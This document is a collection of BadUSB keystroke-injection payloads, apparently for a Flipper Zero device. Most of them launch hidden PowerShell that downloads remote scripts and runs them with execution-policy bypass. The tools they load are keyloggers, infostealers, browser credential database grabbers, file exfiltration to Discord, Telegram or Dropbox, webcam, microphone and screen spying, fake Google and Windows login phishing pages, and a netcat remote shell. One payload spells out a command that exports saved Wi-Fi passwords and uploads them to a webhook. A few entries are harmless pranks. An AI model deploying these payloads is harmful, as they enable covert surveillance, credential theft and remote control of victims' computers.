/MEMZ-In-Powershell/MEMZ-In-Powershell.txt:
--------------------------------------------------------------------------------
REM Title: MEMZ-In-Powershell
REM Author: @beigeworm
REM Description: This script recreates visual effects inspired by the classic MEMZ program
REM Target: Windows 10

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove -W Hidden to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -Ep Bypass -C irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/MEMZ-In-Powershell/main.ps1 | iex
ENTER

--------------------------------------------------------------------------------
/Pranks/Start Windows-93 (parody edition).txt:
--------------------------------------------------------------------------------
REM Title: Start Windows-93 (parody edition)
REM Author: @beigeworm | https://github.com/beigeworm
REM Description: Kills all running edge processes then opens edge in fullscreen on windows-93.
REM Target: Windows 10

REM some setup for dukie script.
DEFAULT_DELAY 100

REM open cmd and kill edge.
GUI r
DELAY 500
STRING cmd /c taskkill /F /IM msedge.exe & start msedge -kiosk www.windows93.net & exit
DELAY 200
ENTER
DELAY 1000
REM use this for fullscreen if needed

--------------------------------------------------------------------------------
/Pranks/System Message.txt:
--------------------------------------------------------------------------------
REM Title: System Message
REM Author: @beigeworm
REM Description: This will open a Message prompt on the Target.
REM Target: Windows 10

REM =============================================================================

REM some setup for dukie script.
DEFAULT_DELAY 100

REM open powershell (remove -W Hidden to show the window)
GUI r
DELAY 750
STRING powershell -W Hidden -Exec Bypass -C "Add-Type -AssemblyName PresentationFramework;[System.Windows.MessageBox]::Show('HACKED MESSAGE BOX')"
ENTER

--------------------------------------------------------------------------------
/Record-Screen-GUI/Record-Screen-GUI.txt:
--------------------------------------------------------------------------------
REM Title: beigeworm's Screen Recorder GUI Tool.
REM Author: @beigeworm
REM Description: This script creates a GUI window for recording the screen to .mkv file.
REM Target: Windows 10

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Record-Screen-GUI/main.ps1 | iex
ENTER

--------------------------------------------------------------------------------
/Webcam-to-Discord/Webcam-to-Discord.txt:
--------------------------------------------------------------------------------
REM Title: Webcam to Discord
REM Author: @beigeworm
REM Description: download a webcam.dll file, find a webcam and take a picture then send it to discord.
REM Target: Windows 10

REM Replace YOUR_WEBHOOK_HERE with your Discord webhook URL

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc = 'YOUR_WEBHOOK_HERE' ; irm is.gd/rhmMua | iex
ENTER

--------------------------------------------------------------------------------
/Computer-Acid/Computer-ACID-Prank.txt:
--------------------------------------------------------------------------------
REM Title: beigeworm's GDI Effects Prank.
REM Author: @beigeworm
REM Description: This script uses GDI effects on the user's display to create visual effects for 90 seconds.
REM Target: Windows 10

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Computer-Acid/main.ps1 | iex
ENTER

--------------------------------------------------------------------------------
/Webhook-Spammer-GUI/Webhook-Spammer-GUI.txt:
--------------------------------------------------------------------------------
REM Title: beigeworm's Webhook Spammer GUI Tool.
REM Author: @beigeworm
REM Description: This script creates a GUI for Spamming a webhook with text or an image.
REM Target: Windows 10

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Webhook-Spammer-GUI/main.ps1 | iex
ENTER

--------------------------------------------------------------------------------
/Image-to-Console/Image-to-Console.txt:
--------------------------------------------------------------------------------
REM Title: Image To Console
REM Author: @beigeworm
REM Description: Convert an image to Powershell console.
REM Target: Windows 10

REM Replace YOUR_WEBHOOK_HERE with your Discord webhook URL

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -C irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Image-to-Console/main.ps1 | iex
ENTER

--------------------------------------------------------------------------------
/Shortcut-Spam/main.ps1:
--------------------------------------------------------------------------------
$n = 100
$i = 0

while($i -lt $n)
{
    $num = Get-Random
    $Location = "C:\Windows\System32\rundll32.exe"
    $WshShell = New-Object -ComObject WScript.Shell
    $Shortcut = $WshShell.CreateShortcut("$Home\Desktop\USB Hardware" + $num + ".lnk")
    $Shortcut.TargetPath = $Location
    $Shortcut.Arguments ="shell32.dll,Control_RunDLL hotplug.dll"
    $Shortcut.IconLocation = "hotplug.dll,0"
    $Shortcut.Description ="Device Removal"
    $Shortcut.WorkingDirectory ="C:\Windows\System32"
    $Shortcut.Save()
    Start-Sleep -Milliseconds 10
    $i++
}

--------------------------------------------------------------------------------
/Network-Enumeration-GUI/Network-Enumeration-GUI.txt:
--------------------------------------------------------------------------------
REM Title: beigeworm's LAN Device Enumeration GUI Tool.
REM Author: @beigeworm
REM Description: This script creates a GUI for enumerating devices on the local network.
REM Target: Windows 10

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Network-Enumeration-GUI/main.ps1 | iex
ENTER

--------------------------------------------------------------------------------
/Social-Search-GUI/Username-Search-GUI.txt:
--------------------------------------------------------------------------------
REM Title: beigeworm's Username Search GUI Tool.
REM Author: @beigeworm
REM Description: This script creates a GUI for searching social media and other sites with a specified Username.
REM Target: Windows 10

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Social-Search-GUI/main.ps1 | iex
ENTER

--------------------------------------------------------------------------------
/Speech-to-Discord/Speech-to-Discord.txt:
--------------------------------------------------------------------------------
REM Title: Speech to Discord
REM Author: @beigeworm
REM Description: Uses assembly 'System.Speech' to take audio input and convert to text and then send the text to discord.
REM Target: Windows 10

REM Replace YOUR_WEBHOOK_HERE with your Discord webhook URL

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc = 'YOUR_WEBHOOK_HERE' ; irm is.gd/bw0speechdc | iex
ENTER

--------------------------------------------------------------------------------
/Beigeworms-Tool-Suite/Beigeworms-Tool-Suite.txt:
--------------------------------------------------------------------------------
REM Title: beigeworm's Tool Suite GUI
REM Author: @beigeworm
REM Description: This script Starts a GUI with a huge set of tools.
REM Target: Windows 10

REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -C irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Beigeworms-Tool-Suite/main.ps1 | iex
ENTER

--------------------------------------------------------------------------------
/Chrome-Extension-Keylogger/README.md:
--------------------------------------------------------------------------------

Keylogger To WebHook - Chrome Extension


SYNOPSIS

Creates the necessary files for a chrome extension that logs all keystrokes on any website.
Then sends the collected keys to a discord webhook.

USAGE
1. Replace YOUR_WEBHOOK_HERE with your webhook. (in the .txt file.)
2. add the txt to your badUSB device and run the script.
3. test by going to a website in chrome browser (eg. google.com) and type some keys
4. Wait 20 seconds and check webhook for results.

CREDITS - Kudos and credit to jakov for the js!

--------------------------------------------------------------------------------
/Filetype-Organizer/Filetype-Organizer.txt:
--------------------------------------------------------------------------------
REM Title: Filetype Organizer
REM Author: @beigeworm
REM Description: This script searches the user's folder for any files with a specific filetype and copies them to the user folder.
REM Target: Windows 10

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove -W Hidden to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -C cd $env:USERPROFILE ;irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Filetype-Organizer/main.ps1 | iex
ENTER

--------------------------------------------------------------------------------
/Tools/Anti-AFK-Tool.txt:
--------------------------------------------------------------------------------
REM Title: Anti-AFK Tool
REM Author: @beigeworm | https://github.com/beigeworm
REM Description: Press random movement keys (Anti-AFK)
REM Target: Windows 10

REM some setup for dukie script.
DEFAULT_DELAY 100
DELAY 1000
GUI r
DELAY 500
STRING powershell -NoP -NonI -Exec Bypass
ENTER
DELAY 4000
STRING Add-Type -AssemblyName System.Windows.Forms;while ($true) {$key = @('w','a','s','d');$randomKey = (Get-Random -InputObject $key -Count 1);[System.Windows.Forms.SendKeys]::SendWait($randomKey);[System.Windows.Forms.SendKeys]::SendWait($randomKey);sleep 1}
ENTER

--------------------------------------------------------------------------------
/Wallpaper-Jumpscare/Wallpaper-Jumpscare.txt:
--------------------------------------------------------------------------------
REM Title: beigeworm's Wallpaper Jump Scare.
REM Author: @beigeworm
REM Description: This script downloads a scary image and sets it as a wallpaper.
REM Target: Windows 10

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Wallpaper-Jumpscare/main.ps1
| iex
CTRL-SHIFT ENTER
DELAY 3000
ALT y

--------------------------------------------------------------------------------
/Record-Screen-to-Discord/Record-Screen-to-Discord.txt:
--------------------------------------------------------------------------------
REM Title: Record Screen to Discord
REM Author: @beigeworm
REM Description: This script records the screen for a specified time to a mkv file, then sends the file to a discord webhook.
REM Target: Windows 10

REM Replace YOUR_WEBHOOK_HERE with your Discord webhook URL

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc = 'YOUR_WEBHOOK_HERE' ; irm is.gd/bw0screendc | iex
ENTER

--------------------------------------------------------------------------------
/Screen-to-Discord/Screenshot-to-Discord.txt:
--------------------------------------------------------------------------------
REM Title: Screenshot to discord webhook
REM Author: @beigeworm
REM Description: This script takes a screenshot of the desktop and posts to a discord webhook.
REM Target: Windows 10

REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw0_sc_to_dc | iex
ENTER

--------------------------------------------------------------------------------
/Wifi-Networks-to-Discord/Discord-WiFi-Grabber.txt:
--------------------------------------------------------------------------------
REM Title: beigeworm's saved WiFi to Discord Webhook.
REM Author: @beigeworm
REM Description: This script collects saved WiFi info and posts results to a discord webhook.
REM Target: Windows 10

REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm is.gd/bw0_wifi_to_dc | iex
ENTER

--------------------------------------------------------------------------------
/USB-Poison/USB-Poison.txt:
--------------------------------------------------------------------------------
REM Title: USB Poison
REM Author: @beigeworm
REM Description: This script runs quietly in the background waiting for new USB storage devices.
REM Description: When a new storage device connects, this script will copy a desired file to the root of newly connected drive.
REM Target: Windows 10

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $DLurl = 'YOUR_FILE_URL_HERE'; $File = 'NAME_OF_FILE_TO_COPY' irm is.gd/bw0poison | iex
ENTER

--------------------------------------------------------------------------------
/Browser-History-to-Discord/Browser-History-to-Discord.txt:
--------------------------------------------------------------------------------
REM Title: beigeworm's browser history to Discord Webhook.
REM Author: @beigeworm
REM Description: This script collects browser history and posts results to a discord webhook.
REM Target: Windows 10

REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw0bhtodc | iex
ENTER

--------------------------------------------------------------------------------
/Record-Mic-to-Discord/Record-Mic-to-Discord.txt:
--------------------------------------------------------------------------------
REM Title: Record Microphone to Discord
REM Author: @beigeworm
REM Description: This script finds the default microphone and records for a specified time to a mp3 file, then sends the file to a discord webhook.
REM Target: Windows 10

REM Replace YOUR_WEBHOOK_HERE with your Discord webhook URL

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc = 'YOUR_WEBHOOK_HERE' ; irm is.gd/bw0mictodc | iex
ENTER

--------------------------------------------------------------------------------
/Clean-History/Clean-History.txt:
--------------------------------------------------------------------------------
REM Title: History Cleaner
REM Author: @beigeworm
REM Description: This script empties the temp folder and recycle bin, and clears the run box and powershell history
REM Target: Windows 10

REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Clean-History/main.ps1 | iex
ENTER

--------------------------------------------------------------------------------
/Discord-Infostealer/System-Info-to-Discord.txt:
--------------------------------------------------------------------------------
REM Title: beigeworm's system information to discord webhook
REM Author: @beigeworm
REM Description: This script gathers system information and posts to a discord webhook address with the results.
REM Target: Windows 10

REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm is.gd/bw0_info_to_dc | iex
ENTER

--------------------------------------------------------------------------------
/Mouse-Monitor-to-Discord/Mouse-Activity-to-Discord.txt:
--------------------------------------------------------------------------------
REM Title: beigeworm's monitor mouse activity to Discord Webhook.
REM Author: @beigeworm
REM Description: This script monitors mouse activity and posts results to a discord webhook.
REM Target: Windows 10

REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove -W Hidden to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -w h -NoP -Ep Bypass -C $dc='DISCORD_WEBHOOK_HERE'; irm is.gd/bw0_mm_to_dc | iex
ENTER

--------------------------------------------------------------------------------
/Exfiltrate-to-Discord/Exfiltrate-to-Discord.txt:
--------------------------------------------------------------------------------
REM Title: beigeworm's Exfiltrate files to Discord
REM Author: @beigeworm
REM Description: This script searches the user's folder for pictures, documents, logs, PDFs and more, then sends it all to a Discord Webhook.
REM Target: Windows 10

REM *SETUP*
REM replace WEBHOOK_HERE with your Discord Webhook.

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove -W Hidden to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='WEBHOOK_HERE'; irm is.gd/bw0_ex_to_dc | iex
ENTER

--------------------------------------------------------------------------------
/Google-Phishing/Google-Phish-to-Discord.txt:
--------------------------------------------------------------------------------
REM Title: beigeworm's Fake Google Phishing page to Discord Webhook.
REM Author: @beigeworm
REM Description: This script makes a Fake Google Phishing page and posts results to a discord webhook.
REM Target: Windows 10

REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove -W Hidden to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -w h -NoP -Ep Bypass -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw0_gp_to_dc | iex
ENTER

--------------------------------------------------------------------------------
/Mouse-Clicks-Recorder/Mouse-Clicks-Recorder.txt:
--------------------------------------------------------------------------------
REM Title: Mouse Clicks Recorder
REM Author: @beigeworm
REM Description: Record your mouse clicks and positions along with interval time between clicks.. (for loading screens etc.)
REM Description: Play them back later and automate clicky tasks!
REM Target: Windows 10

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove -W Hidden to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -Ep Bypass -C irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Mouse-Clicks-Recorder/main.ps1 | iex
ENTER

--------------------------------------------------------------------------------
/Uvnc-Remote-Desktop/Uvnc-Remote-Desktop.txt:
--------------------------------------------------------------------------------
REM Title: Uvnc-Remote-Desktop
REM Author: @beigeworm | https://github.com/beigeworm
REM Description: Downloads Uvnc client to machine and runs winvnc.exe
REM Target: Windows 10

REM *REQUIREMENTS*
REM admin required for disable USB function.

REM some setup for dukie script.
DEFAULT_DELAY 100

REM open powershell (remove -W Hidden to show the window).
GUI r
DELAY 750
STRING powershell -Exec Bypass -C $ip = ''; irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Uvnc-Remote-Desktop/main.ps1 | iex
CTRL-SHIFT ENTER
DELAY 2500
ALT y

--------------------------------------------------------------------------------
/Chrome-Extension-Keylogger/Chrome-Extension-Keylogger.txt:
--------------------------------------------------------------------------------
REM Title: Keylogger To WebHook - Chrome Extension
REM Author: @beigeworm
REM Description: Creates the necessary files for a chrome extension that logs all keystrokes on any website. Then sends the collected keys to a discord webhook.
REM Target: Windows 10
REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm is.gd/lp84nbw0 | iex
ENTER

--------------------------------------------------------------------------------
/Discord-Keylogger/Keylogger-to-Discord.txt:
--------------------------------------------------------------------------------
REM Title: beigeworm's Keylogger to Discord Webhook.
REM Author: @beigeworm
REM Description: This script logs all Keystrokes and posts results to a discord webhook when the keyboard goes inactive for more than 10 secs.
REM Target: Windows 10

REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm is.gd/bw0_kl_to_dc | iex
ENTER

--------------------------------------------------------------------------------
/File-Monitor-to-Discord/File-Changes-to-Discord.txt:
--------------------------------------------------------------------------------
REM Title: beigeworm's monitor file changes to Discord Webhook.
REM Author: @beigeworm
REM Description: This script monitors any file changes in the USERPROFILE directory and posts results to a discord webhook.
REM Target: Windows 10

REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove -W Hidden to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm is.gd/bw0_fm_to_dc | iex
ENTER

--------------------------------------------------------------------------------
/Pranks/5 second Screen Kill.txt:
--------------------------------------------------------------------------------
REM Title: 5 Second Display Kill
REM Author: @beigeworm | https://github.com/beigeworm
REM Description: Uses Powershell to kill all displays for a short period of time.
REM Target: Windows 10,11

DEFAULT_DELAY 100

REM open powershell (remove -W Hidden to show the window)
GUI r
DELAY 750
STRING powershell -NoP -NonI -W Hidden -Exec Bypass
CTRL-SHIFT ENTER
DELAY 1500
ALT y
DELAY 5000

STRING (Add-Type '[DllImport("user32.dll")]public static extern int SendMessage
STRING (int hWnd, int hMsg, int wParam, int lParam);' -Name a -Pas)::SendMessage(-1,0x0112,0xF170,2);sleep 5;exit
ENTER

--------------------------------------------------------------------------------
/Screen-to-Telegram/Screenshot-to-Telegram.txt:
--------------------------------------------------------------------------------
REM Title: Screenshot to Telegram Bot Chat
REM Author: @beigeworm
REM Description: This script takes a screenshot of the desktop and posts to a Telegram Bot Chat.
REM Target: Windows 10

REM *SETUP*
REM replace TELEGRAM_TOKEN_HERE with your Telegram Token.

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $tg='TELEGRAM_TOKEN_HERE'; irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Screen-to-Telegram/main.ps1 | iex
ENTER

--------------------------------------------------------------------------------
/Voice-Activated-DarkMode/Voice-Activated-DarkMode.txt:
--------------------------------------------------------------------------------
REM Title: Voice-Activated-DarkMode
REM Author: @beigeworm | https://github.com/beigeworm
REM Description: Control Windows theme with your voice. Say 'Light' OR 'Dark' to change theme.
REM Target: Windows 10

REM *REQUIREMENTS*
REM admin required for disable USB function.

REM some setup for dukie script.
DEFAULT_DELAY 100

REM open powershell (remove -W Hidden to show the window).
GUI r
DELAY 750
STRING powershell -Exec Bypass -C irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Voice-Activated-DarkMode/main.ps1 | iex
CTRL-SHIFT ENTER
DELAY 2500
ALT y

--------------------------------------------------------------------------------
/Win10-Phishing/Fake-Windows-10-Logon.txt:
--------------------------------------------------------------------------------
REM Title: beigeworm's Fake Windows Logon Screen to Discord Webhook.
REM Author: @beigeworm
REM Description: This script kills all edge and chrome processes, starts screensaver and opens edge in fullscreen that asks for login info and posts results to a discord webhook.
REM Target: Windows 10

REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm is.gd/bw0_win10_to_dc | iex
ENTER

--------------------------------------------------------------------------------
/Win11-Phishing/Fake-Windows-11-Logon.txt:
--------------------------------------------------------------------------------
REM Title: beigeworm's Fake Windows Logon Screen to Discord Webhook.
REM Author: @beigeworm
REM Description: This script kills all edge and chrome processes, starts screensaver and opens edge in fullscreen that asks for login info and posts results to a discord webhook.
REM Target: Windows 10

REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm is.gd/bw0_win11_to_dc | iex
ENTER

--------------------------------------------------------------------------------
/OSINT/Discord WiFi Grabber 2.txt:
--------------------------------------------------------------------------------

REM Title: Wifi Grabber to Discord 2
REM Author: @beigeworm
REM Description: Uses Powershell to gather Wifi info and send it via Discord.
REM Target: Windows 10

REM *SETUP*
REM replace YOUR_WEBHOOK_HERE with your discord webhook.

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove -W Hidden to show the window)
GUI r
DELAY 750
STRING powershell -NoP -NonI -Exec Bypass
ENTER
DELAY 4000

STRING cd $env:tmp;netsh wlan export profile key=clear;Select-String -Path Wi*.xml -Pattern 'keyMa*' > Wi-Fi;curl.exe -F "f=@Wi-Fi" "YOUR_WEBHOOK_HERE";rm "Wi-*"
DELAY 500
ENTER

--------------------------------------------------------------------------------
/Chrome-DB-to-Discord/Chrome-DB-to-Discord.txt:
--------------------------------------------------------------------------------
REM Title: Chrome DB to Discord
REM Author: @beigeworm
REM Description: Chrome stores visited websites, password entries, Address entries, email entries and more inside database files
REM Description: They can be extracted to a discord chat and viewed in something like 'DB Browser'.
REM Target: Windows 10

REM Replace YOUR_WEBHOOK_HERE with your Discord webhook URL

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc = 'YOUR_WEBHOOK_HERE' ; irm is.gd/bw0chdbdc | iex
ENTER

--------------------------------------------------------------------------------
/Netcat-Client/Simple-Netcat-Client.txt:
--------------------------------------------------------------------------------

REM Title: Beigeworm's Simple Netcat Client
REM Author: @beigeworm
REM Description: This script connects target computer with a netcat session to send powershell commands.
REM Target: Windows 10

REM *SETUP*
REM replace IP_HERE with your netcat attacker IP Address.
REM NOTE The PORT number is 4444

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $ip='IP_HERE'; irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Netcat-Client/main.ps1 | iex
ENTER

--------------------------------------------------------------------------------
/Telegram-Infostealer/System-Info-to-Telegram.txt:
--------------------------------------------------------------------------------

REM Title: beigeworm's system information to Telegram Bot
REM Author: @beigeworm
REM Description: This script gathers system information and posts to Telegram Bot Chat with the results.
REM Target: Windows 10

REM *SETUP*
REM replace BOT_TOKEN with your Telegram bot token.

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $tg='BOT_TOKEN';$cid='CHAT_ID'; irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Telegram-Infostealer/main.ps1 | iex
ENTER

--------------------------------------------------------------------------------
/Telegram-Keylogger/Keylogger-to-Telegram.txt:
--------------------------------------------------------------------------------

REM Title: beigeworm's Keylogger to Telegram Chat.
REM Author: @beigeworm
REM Description: This script logs all Keystrokes and posts results to a Telegram chat when the keyboard goes inactive for more than 10 secs.
REM Target: Windows 10

REM *SETUP*
REM replace TOKEN_HERE with your Telegram token.

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $tg='TOKEN_HERE'; irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Telegram-Keylogger/main.ps1 | iex
ENTER

--------------------------------------------------------------------------------
/Tools/Update Windows in Powershell.txt:
--------------------------------------------------------------------------------
REM Title: Update from Powershell
REM Author: @beigeworm | https://github.com/beigeworm
REM Description: Uses Powershell to update windows.
REM Target: Windows 10

REM some setup for dukie script.
DEFAULT_DELAY 100

REM open powershell (add "-W Hidden" to hide the window).
GUI r
DELAY 750
STRING powershell -NoP -NonI -Exec Bypass
CTRL-SHIFT ENTER
DELAY 1500
ALT y
DELAY 5000

STRING Install-Module PSWindowsUpdate
ENTER
DELAY 5000
ENTER
DELAY 5000
STRING a
ENTER
DELAY 250
STRING Get-WindowsUpdate -AcceptAll -Install -AutoReboot
ENTER
DELAY 10000
STRING exit
ENTER

--------------------------------------------------------------------------------
/Exfiltrate-to-Dropbox/Exfiltrate-to-Dropbox.txt:
--------------------------------------------------------------------------------

REM Title: beigeworm's Exfiltrate files to Dropbox
REM Author: @beigeworm
REM Description: This script searches the users folder for pictures, documents, logs, PDFs and more, then sends it all to a dropbox account.
REM Target: Windows 10

REM *SETUP*
REM replace DROPBOX_TOKEN with your Dropbox Token.

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove -W Hidden to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $db='DROPBOX_TOKEN'; irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Exfiltrate-to-Dropbox/main.ps1 | iex
ENTER

--------------------------------------------------------------------------------
/Exfiltrate-to-Telegram/Exfiltrate-to-Telegram.txt:
--------------------------------------------------------------------------------

REM Title: beigeworm's Exfiltrate files to Telegram
REM Author: @beigeworm
REM Description: This script searches the users folder for pictures, documents, logs, PDFs and more, then sends it all to a dropbox account.
REM Target: Windows 10

REM *SETUP*
REM replace TELEGRAM_TOKEN with your Telegram Token.

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove -W Hidden to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $tg='TELEGRAM_TOKEN'; irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Exfiltrate-to-Telegram/main.ps1 | iex
ENTER

--------------------------------------------------------------------------------
/Discord-Media-Hog/Discord-Media-Hog.txt:
--------------------------------------------------------------------------------
REM Title: Discord-Media-Hog
REM Author: @beigeworm | https://github.com/beigeworm
REM Description: Uses a Discord bot to send system information, a stream desktop and webcam screenshots
REM Description: READ SETUP IN MAIN.PS1
REM Target: Windows 10

REM *REQUIREMENTS*
REM admin required for disable USB function.

REM some setup for dukie script.
DEFAULT_DELAY 100

